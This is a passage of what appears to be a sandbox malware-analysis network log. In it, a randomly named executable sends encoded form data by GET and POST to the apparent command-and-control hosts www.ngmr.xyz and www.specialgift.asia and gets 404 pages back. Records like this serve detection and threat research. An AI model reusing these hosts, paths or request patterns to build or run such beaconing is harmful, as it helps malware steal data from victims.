                                                                    Data Ascii: 1ZqD=YJER3XDDdqQ5AwO+uNc2oTXmJqvdxImLSOz2oP7BBy+Kw77ntU7DcR+7JWJicD4+W4feBS6t77La0ONRiU5LvF1uuF1mOYUt1LIoXz+Reozs/KC95TBe23nMPzetyplS6qgW3GCpdNDNoPqEGoCZygcnAmUEJ6nstn/9p+7ymSzzeWwKZ9Yj+bd/WueldJ/phWKrF9s7xB5CcSJ4vzWkLRnkWCbLgH48YhoF+SA87y015P1VVPLOaqsHQsGSmF21R7ntgFAyeFoLIspJ0W9WIYopGLLiUaqs18oK4fBRtxWKREjB95HPrS8TUgHhQTDAvRYS7kh0k14AaicMlpgH3zkl4rq7AaxG3NX5j7emAizAtbtqW8ZNd6m06/Td2aJqxvZQrl8ytx7A/MTnCFKD7zQZMwq++mkXDc8ym0QLU4nDYriVklj63WhNcHuSCvnjo/k7tEQu4OwYYZNoShH/2QqBpErYXHwGZTE8iHxXbW13V+tPFu4oXNYb5TPDtZdYwmL348edVuT5v/RZDEHRjdeXS7TgVobuJf6RizUSYQ6OjlVdull8DwuzQ73L6if42yLnC/79Kv7eAZl0mjqduaiSmX+qNQ2QecaXJpGVCNGo5u4RHR31Veotqa1Ko9YdTjGFquOEDy2i2Z3FdeCAatf6IX8op6a9yIJw9KnZsNrlOEUm2Kj5+GLopRjCR4pTLbMzHTDSkKUhjW6ozxNFzZJrEWZJncd6WCyafprOAuZQ2TXHQosZKIZ16HefKkC1P2/+qHJsOGOUSP1KcLBPRVKxJak8K4TyWN0NStDkv76aLnTyqiOT5WbxQmzldvy2SISZkorrRgZeGI9jbslAdPujX2eVq6rVYcOf/ix5hPnxI0I7p+HKRxita0es1P6h06SL/yDz4em8s0b8jAnebponHEOmR3N+zE2azzYT+pSfg19PAGOkToXy3fUDAS2Ig4DQkrhZjovZ8YYYUqiXVMJUDLY83jwNB2wVW0nJo8q9b56 [TRUNCATED]
                                                                    Jan 11, 2025 06:32:33.174417019 CET550INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 282
                                                                    Accept-Ranges: bytes
                                                                    Date: Sat, 11 Jan 2025 05:55:47 GMT
                                                                    X-Varnish: 1719142305
                                                                    Age: 0
                                                                    Via: 1.1 varnish
                                                                    Connection: close
                                                                    X-Varnish-Cache: MISS
                                                                    Server: C2M Server v1.02
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.84972554.67.87.110805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:35.133351088 CET510OUTGET /qj8y/?dbFX6=JLnL0&1ZqD=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg== HTTP/1.1
                                                                    Host: www.ngmr.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Jan 11, 2025 06:32:35.709069014 CET550INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 282
                                                                    Accept-Ranges: bytes
                                                                    Date: Sat, 11 Jan 2025 05:55:50 GMT
                                                                    X-Varnish: 1719142311
                                                                    Age: 0
                                                                    Via: 1.1 varnish
                                                                    Connection: close
                                                                    X-Varnish-Cache: MISS
                                                                    Server: C2M Server v1.02
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.84972635.156.117.131805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:41.166868925 CET787OUTPOST /5x7s/ HTTP/1.1
                                                                    Host: www.specialgift.asia
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.specialgift.asia
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.specialgift.asia/5x7s/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 4c 35 65 32 49 59 36 4e 4a 44 43 6e 62 4e 4c 2f 44 6d 35 67 79 70 79 6f 37 50 6a 41 69 41 61 63 54 37 78 70 58 6d 54 73 65 76 45 6c 4f 35 51 30 4f 4f 50 78 77 2f 4c 57 35 57 62 42 59 58 76 51 49 78 4a 52 57 69 36 45 57 46 6e 72 6f 54 47 44 2f 4c 63 51 44 66 78 52 37 36 76 34 4d 7a 46 58 39 63 39 55 67 55 57 69 50 38 46 2b 43 68 66 6f 45 78 33 4f 4a 54 7a 71 43 44 4c 68 4b 75 51 76 45 69 44 53 47 30 70 6d 45 31 63 54 4c 6a 30 4b 48 4a 4f 64 66 51 68 52 51 4c 51 70 6e 56 39 69 47 72 70 77 36 4a 62 55 4c 6a 37 69 4a 49 63 53 56 6f 70 46 62 71 62 4d 33 51 50 7a 70 38 65 50 64 47 50 50 33 78 51 3d
                                                                    Data Ascii: 1ZqD=L5e2IY6NJDCnbNL/Dm5gypyo7PjAiAacT7xpXmTsevElO5Q0OOPxw/LW5WbBYXvQIxJRWi6EWFnroTGD/LcQDfxR76v4MzFX9c9UgUWiP8F+ChfoEx3OJTzqCDLhKuQvEiDSG0pmE1cTLj0KHJOdfQhRQLQpnV9iGrpw6JbULj7iJIcSVopFbqbM3QPzp8ePdGPP3xQ=
                                                                    Jan 11, 2025 06:32:42.302730083 CET1236INHTTP/1.1 404 Not Found
                                                                    Server: openresty
                                                                    Date: Sat, 11 Jan 2025 05:32:42 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Status: 404 Not Found
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-XSS-Protection: 1; mode=block
                                                                    X-Content-Type-Options: nosniff
                                                                    Cache-Control: no-cache
                                                                    X-Request-Id: 5e9bfc8ea0ff8853fd2beccdb4380833
                                                                    X-Runtime: 0.061585
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 34 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 56 4b 6f db 38 10 be f7 57 4c 7d 58 da 1b 3d e2 20 ed 02 b1 e5 22 69 b3 45 80 4d 52 b4 0d f6 60 18 05 2d 8d 65 26 14 a9 25 29 3b da 24 ff bd 43 49 7e 24 e9 61 2f eb 83 45 ce 7c c3 79 f0 9b 91 c6 4b 57 c8 c9 1b 80 f1 12 79 e6 17 b4 74 c2 49 9c 7c e1 39 82 d2 0e 16 ba 52 19 84 f0 cd 19 71 27 54 2e eb 71 dc 42 5a 78 81 8e 83 c8 92 de 4a e0 ba d4 c6 f5 40 f1 02 f7 f7 a9 56 0e 95 4b 7a 6b 91 b9 65 92 e1 4a a4 18 36 9b 00 84 12 4e 70 19 da 94 4b 4c 86 d1 61 00 05 bf 17 45 55 ec 44 3d 88 3b 6f 52 a8 3b 58 1a 5c 24 6c e9 5c 69 4f e2 78 41 a7 db 28 d7 3a 97 c8 4b 61 a3 54 17 71 6a ed 87 05 2f 84 ac 93 4b af 47 63 b8 7b bc 2e 51 1d 7c e3 ca 32 30 28 13 66 5d 2d d1 2e 11 1d 03 57 97 98 30 87 f7 ce 1b b3 d7 fe e2 98 5b 8b e4 ca 6e 2b d1 b8 6a a5 f1 f1 e1 71 d8 9e 17 79 fb ff ea e0 6d 18 4e c5 02 a4 43 b8 38 87 3f 66 ad 98 14 8d e9 66 07 10 51 b9 10 1e a0 e4 59 46 be 43 a7 cb 13 18 be 3f 2c ef 47 f0 b4 b1 89 f7 8c c6 6f a7 a8 32 b1 98 85 61 27 b0 a9 11 a5 6b e3 e8 [TRUNCATED]
                                                                    Data Ascii: 412VKo8WL}X= "iEMR`-e&%);$CI~$a/E|yKWytI|9Rq'T.qBZxJ@VKzkeJ6NpKLaEUD=;oR;X\$l\iOxA(:KaTqj/KGc{.Q|20(f]-.W0[n+jqymNC8?ffQYFC?,Go2a'k5qo)$*.k'RJNht&A1xSl[L%f$f?Ix|QYe*.v4JWOa0U m%z`_t9Na<"6dz8ZVI>*^#'`4:tl, Z~!Tevwks6yYixnxtLidBiU_(iL/P*7 4FhsuSe3!uVwRIyJk6$}o+Et}jyv/r7W"c('gjZW}k0^+Xo&S)rI_o^9t4Z9{1<K^L+~X0o~[`&"41]F#
                                                                    Jan 11, 2025 06:32:42.302755117 CET246INData Raw: 4b 79 51 72 91 2b 0f fa 61 08 60 7c 87 4d e0 92 df 21 5c d6 70 4d e9 fd dd a6 47 f7 c4 f7 22 7f 96 c6 36 50 7f 4f 20 b9 f2 83 e4 ff 0f 73 2c 8a 1c 7c b7 f5 e2 b8 2a a5 e6 d9 fe 08 4d 33 d5 38 b1 8e 13 ef 62 4d 37 61 62 1f 60 d8 72 e5 e8 3e 2a 55
                                                                    Data Ascii: KyQr+a`|M!\pMG"6PO s,|*M38bM7ab`r>*U_{Slocv5_'k76||k!7r$J4]Y1n#*w<l/=U"u}MH*v.J&w6_4{lO#(0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.84972735.156.117.131805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:43.709134102 CET807OUTPOST /5x7s/ HTTP/1.1
                                                                    Host: www.specialgift.asia
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.specialgift.asia
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.specialgift.asia/5x7s/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 4c 35 65 32 49 59 36 4e 4a 44 43 6e 64 6f 44 2f 41 46 68 67 35 70 79 33 33 76 6a 41 72 67 61 51 54 37 39 70 58 6a 72 43 64 63 77 6c 4f 62 34 30 50 4d 33 78 39 66 4c 57 79 32 62 45 48 48 76 58 49 78 4e 76 57 6a 47 45 57 46 7a 72 6f 58 4b 44 38 34 30 54 4d 76 78 66 7a 61 76 36 43 54 46 58 39 63 39 55 67 55 79 49 50 38 64 2b 43 53 33 6f 57 54 66 4e 4b 54 7a 31 56 7a 4c 68 48 4f 51 56 45 69 43 33 47 31 6c 63 45 33 55 54 4c 68 63 4b 47 62 32 65 55 51 68 58 65 72 52 4e 6f 46 73 6f 47 4b 31 48 6e 5a 33 73 44 51 6a 36 4d 2b 78 34 50 4b 68 44 59 71 7a 6e 33 54 6e 46 73 4c 44 6e 48 6c 66 2f 70 6d 46 63 38 43 55 67 66 39 6b 67 71 75 6a 6e 61 6f 39 5a 77 69 71 52
                                                                    Data Ascii: 1ZqD=L5e2IY6NJDCndoD/AFhg5py33vjArgaQT79pXjrCdcwlOb40PM3x9fLWy2bEHHvXIxNvWjGEWFzroXKD840TMvxfzav6CTFX9c9UgUyIP8d+CS3oWTfNKTz1VzLhHOQVEiC3G1lcE3UTLhcKGb2eUQhXerRNoFsoGK1HnZ3sDQj6M+x4PKhDYqzn3TnFsLDnHlf/pmFc8CUgf9kgqujnao9ZwiqR
                                                                    Jan 11, 2025 06:32:44.841963053 CET1236INHTTP/1.1 404 Not Found
                                                                    Server: openresty
                                                                    Date: Sat, 11 Jan 2025 05:32:44 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Status: 404 Not Found
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-XSS-Protection: 1; mode=block
                                                                    X-Content-Type-Options: nosniff
                                                                    Cache-Control: no-cache
                                                                    X-Request-Id: 332091dbd504ab19ca6a74e331d4f33e
                                                                    X-Runtime: 0.025505
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 34 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 56 4b 6f db 38 10 be f7 57 4c 7d 58 da 1b 3d e2 20 ed 02 b1 e5 22 69 b3 45 80 4d 52 b4 0d f6 60 18 05 2d 8d 65 26 14 a9 25 29 3b da 24 ff bd 43 49 7e 24 e9 61 2f eb 83 45 ce 7c c3 79 f0 9b 91 c6 4b 57 c8 c9 1b 80 f1 12 79 e6 17 b4 74 c2 49 9c 7c e1 39 82 d2 0e 16 ba 52 19 84 f0 cd 19 71 27 54 2e eb 71 dc 42 5a 78 81 8e 83 c8 92 de 4a e0 ba d4 c6 f5 40 f1 02 f7 f7 a9 56 0e 95 4b 7a 6b 91 b9 65 92 e1 4a a4 18 36 9b 00 84 12 4e 70 19 da 94 4b 4c 86 d1 61 00 05 bf 17 45 55 ec 44 3d 88 3b 6f 52 a8 3b 58 1a 5c 24 6c e9 5c 69 4f e2 78 41 a7 db 28 d7 3a 97 c8 4b 61 a3 54 17 71 6a ed 87 05 2f 84 ac 93 4b af 47 63 b8 7b bc 2e 51 1d 7c e3 ca 32 30 28 13 66 5d 2d d1 2e 11 1d 03 57 97 98 30 87 f7 ce 1b b3 d7 fe e2 98 5b 8b e4 ca 6e 2b d1 b8 6a a5 f1 f1 e1 71 d8 9e 17 79 fb ff ea e0 6d 18 4e c5 02 a4 43 b8 38 87 3f 66 ad 98 14 8d e9 66 07 10 51 b9 10 1e a0 e4 59 46 be 43 a7 cb 13 18 be 3f 2c ef 47 f0 b4 b1 89 f7 8c c6 6f a7 a8 32 b1 98 85 61 27 b0 a9 11 a5 6b e3 e8 [TRUNCATED]
                                                                    Data Ascii: 412VKo8WL}X= "iEMR`-e&%);$CI~$a/E|yKWytI|9Rq'T.qBZxJ@VKzkeJ6NpKLaEUD=;oR;X\$l\iOxA(:KaTqj/KGc{.Q|20(f]-.W0[n+jqymNC8?ffQYFC?,Go2a'k5qo)$*.k'RJNht&A1xSl[L%f$f?Ix|QYe*.v4JWOa0U m%z`_t9Na<"6dz8ZVI>*^#'`4:tl, Z~!Tevwks6yYixnxtLidBiU_(iL/P*7 4FhsuSe3!uVwRIyJk6$}o+Et}jyv/r7W"c('gjZW}k0^+Xo&S)rI_o^9t4Z9{1<K^L+~X0o~[`&"41]F#
                                                                    Jan 11, 2025 06:32:44.842019081 CET246INData Raw: 4b 79 51 72 91 2b 0f fa 61 08 60 7c 87 4d e0 92 df 21 5c d6 70 4d e9 fd dd a6 47 f7 c4 f7 22 7f 96 c6 36 50 7f 4f 20 b9 f2 83 e4 ff 0f 73 2c 8a 1c 7c b7 f5 e2 b8 2a a5 e6 d9 fe 08 4d 33 d5 38 b1 8e 13 ef 62 4d 37 61 62 1f 60 d8 72 e5 e8 3e 2a 55
                                                                    Data Ascii: KyQr+a`|M!\pMG"6PO s,|*M38bM7ab`r>*U_{Slocv5_'k76||k!7r$J4]Y1n#*w<l/=U"u}MH*v.J&w6_4{lO#(0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.84972835.156.117.131805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:46.257361889 CET1824OUTPOST /5x7s/ HTTP/1.1
                                                                    Host: www.specialgift.asia
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.specialgift.asia
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.specialgift.asia/5x7s/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 4c 35 65 32 49 59 36 4e 4a 44 43 6e 64 6f 44 2f 41 46 68 67 35 70 79 33 33 76 6a 41 72 67 61 51 54 37 39 70 58 6a 72 43 64 64 49 6c 4f 6f 41 30 4f 74 33 78 38 66 4c 57 39 6d 62 46 48 48 75 53 49 33 6c 7a 57 6a 4b 55 57 47 4c 72 70 79 57 44 6f 5a 30 54 62 66 78 66 78 61 76 33 4d 7a 46 43 39 63 4e 51 67 55 43 49 50 38 64 2b 43 58 7a 6f 41 78 33 4e 4d 54 7a 71 43 44 4b 75 4b 75 52 36 45 69 72 4b 47 31 77 68 48 44 67 54 49 42 73 4b 46 75 69 65 57 77 68 56 5a 72 52 56 6f 46 67 72 47 4b 70 4c 6e 5a 7a 4b 44 51 4c 36 4f 34 73 62 65 5a 68 49 62 5a 33 47 2b 43 4c 44 67 63 50 6d 43 47 7a 5a 6f 48 64 46 73 43 41 32 52 4f 41 4d 67 70 43 54 59 35 39 36 39 6e 48 35 79 41 35 31 4a 36 75 76 51 50 54 79 74 42 30 76 4a 4c 72 79 62 37 52 2b 4d 32 71 44 44 6d 42 73 64 58 32 58 72 6b 6c 4c 4d 43 75 33 74 75 4a 68 44 75 78 4e 6c 62 37 42 4b 2b 42 35 37 48 6e 65 54 45 30 4b 66 2f 51 68 6b 71 6d 78 75 34 31 4c 34 5a 77 70 6e 4d 68 35 34 48 6e 71 74 64 6c 73 6f 6b 6f 45 78 71 32 6c 2f 42 54 4e 31 69 36 50 30 [TRUNCATED]
                                                                    Data Ascii: 1ZqD=L5e2IY6NJDCndoD/AFhg5py33vjArgaQT79pXjrCddIlOoA0Ot3x8fLW9mbFHHuSI3lzWjKUWGLrpyWDoZ0Tbfxfxav3MzFC9cNQgUCIP8d+CXzoAx3NMTzqCDKuKuR6EirKG1whHDgTIBsKFuieWwhVZrRVoFgrGKpLnZzKDQL6O4sbeZhIbZ3G+CLDgcPmCGzZoHdFsCA2ROAMgpCTY5969nH5yA51J6uvQPTytB0vJLryb7R+M2qDDmBsdX2XrklLMCu3tuJhDuxNlb7BK+B57HneTE0Kf/Qhkqmxu41L4ZwpnMh54HnqtdlsokoExq2l/BTN1i6P0F7w1blw9aNHweI2aehJN1qmd47oUjaNx2vrjwy45aIwGege/j/OeVNJXDOWTsU1bs6nfaOLRGZVDEOJcYl9z1TPV6WbQHC3pvJNc4XCFpeXHkuSMftnb58HRXfRQXXXcc7dBpim/WjsfHO6e5+6I+ILy/cYIH3WVfxWU/o0xi7g4JYdIx+pI4+BRWa4/10gSxptr9ggEjN/Qc84qtVPixSD59qWhMiHCf7mlujNUUw/suoUR20QDumzpj1T48WBqG0+T2aStB5keb20gyE2fFWfwD+4n8nNc13zR+BxGOc9GK99HR8Uf1l7C3jlyqDY/qsMipImUyRSCVM1J1WM3n9uoGlVxzH7lX8U8iT5bmwolN7DQN8n+8oo2On1EBX01lEHbQAim3IPJF0k9fwqmcGr7LPN/+W6YdyKbHqHwInS1aOTnu6k0IXAq1Wa8aJer3A/yeq5XiBma1gabyquNsSak/Wu1ihvOsWVNnFUb8dTB4yUSvAhYDh2DxtDyNJ4mRVQrhaSRO3Q8uAhzoaZHPOefRTamqy7a4SR80zRYurHVHddtl7jE/RaYMQE/US646WRFDEi0RrcTd45OWCHviWNTXFncmKsyqV5ePU1ZvmFQyMhGX9x52slXTucPE8e5AiQwp2iKmzGfd4ndRISuZUT5AKZ8rYaeyY [TRUNCATED]
                                                                    Jan 11, 2025 06:32:47.458950996 CET1236INHTTP/1.1 404 Not Found
                                                                    Server: openresty
                                                                    Date: Sat, 11 Jan 2025 05:32:47 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Status: 404 Not Found
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-XSS-Protection: 1; mode=block
                                                                    X-Content-Type-Options: nosniff
                                                                    Cache-Control: no-cache
                                                                    X-Request-Id: 4142429651ce0a3142f157486796473d
                                                                    X-Runtime: 0.043565
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 34 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 56 4b 6f db 38 10 be f7 57 4c 7d 58 da 1b 3d e2 20 ed 02 b1 e5 22 69 b3 45 80 4d 52 b4 0d f6 60 18 05 2d 8d 65 26 14 a9 25 29 3b da 24 ff bd 43 49 7e 24 e9 61 2f eb 83 45 ce 7c c3 79 f0 9b 91 c6 4b 57 c8 c9 1b 80 f1 12 79 e6 17 b4 74 c2 49 9c 7c e1 39 82 d2 0e 16 ba 52 19 84 f0 cd 19 71 27 54 2e eb 71 dc 42 5a 78 81 8e 83 c8 92 de 4a e0 ba d4 c6 f5 40 f1 02 f7 f7 a9 56 0e 95 4b 7a 6b 91 b9 65 92 e1 4a a4 18 36 9b 00 84 12 4e 70 19 da 94 4b 4c 86 d1 61 00 05 bf 17 45 55 ec 44 3d 88 3b 6f 52 a8 3b 58 1a 5c 24 6c e9 5c 69 4f e2 78 41 a7 db 28 d7 3a 97 c8 4b 61 a3 54 17 71 6a ed 87 05 2f 84 ac 93 4b af 47 63 b8 7b bc 2e 51 1d 7c e3 ca 32 30 28 13 66 5d 2d d1 2e 11 1d 03 57 97 98 30 87 f7 ce 1b b3 d7 fe e2 98 5b 8b e4 ca 6e 2b d1 b8 6a a5 f1 f1 e1 71 d8 9e 17 79 fb ff ea e0 6d 18 4e c5 02 a4 43 b8 38 87 3f 66 ad 98 14 8d e9 66 07 10 51 b9 10 1e a0 e4 59 46 be 43 a7 cb 13 18 be 3f 2c ef 47 f0 b4 b1 89 f7 8c c6 6f a7 a8 32 b1 98 85 61 27 b0 a9 11 a5 6b e3 e8 [TRUNCATED]
                                                                    Data Ascii: 412VKo8WL}X= "iEMR`-e&%);$CI~$a/E|yKWytI|9Rq'T.qBZxJ@VKzkeJ6NpKLaEUD=;oR;X\$l\iOxA(:KaTqj/KGc{.Q|20(f]-.W0[n+jqymNC8?ffQYFC?,Go2a'k5qo)$*.k'RJNht&A1xSl[L%f$f?Ix|QYe*.v4JWOa0U m%z`_t9Na<"6dz8ZVI>*^#'`4:tl, Z~!Tevwks6yYixnxtLidBiU_(iL/P*7 4FhsuSe3!uVwRIyJk6$}o+Et}jyv/r7W"c('gjZW}k0^+Xo&S)rI_o^9t4Z9{1<K^L+~X0o~[`&"41]F#
                                                                    Jan 11, 2025 06:32:47.458973885 CET246INData Raw: 4b 79 51 72 91 2b 0f fa 61 08 60 7c 87 4d e0 92 df 21 5c d6 70 4d e9 fd dd a6 47 f7 c4 f7 22 7f 96 c6 36 50 7f 4f 20 b9 f2 83 e4 ff 0f 73 2c 8a 1c 7c b7 f5 e2 b8 2a a5 e6 d9 fe 08 4d 33 d5 38 b1 8e 13 ef 62 4d 37 61 62 1f 60 d8 72 e5 e8 3e 2a 55
                                                                    Data Ascii: KyQr+a`|M!\pMG"6PO s,|*M38bM7ab`r>*U_{Slocv5_'k76||k!7r$J4]Y1n#*w<l/=U"u}MH*v.J&w6_4{lO#(0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.84972935.156.117.131805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:48.798449039 CET518OUTGET /5x7s/?1ZqD=G72WLubJMS3dcb26AEgi3aGXwYX/pSO4ef8LZR/GCsxFLMdiWd/rxNP93kykZnn+RGVOZz24Lnm2tnjD2KJLN51qk8LIdSpvhcJdwUuCC545HWD+B0z6B0HNWAHTPddxeA==&dbFX6=JLnL0 HTTP/1.1
                                                                    Host: www.specialgift.asia
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Jan 11, 2025 06:32:49.940907955 CET1236INHTTP/1.1 404 Not Found
                                                                    Server: openresty
                                                                    Date: Sat, 11 Jan 2025 05:32:49 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 2088
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Status: 404 Not Found
                                                                    X-Request-Id: 49fe5fcdb0b6c214c609b440749161a5
                                                                    X-Runtime: 0.039283
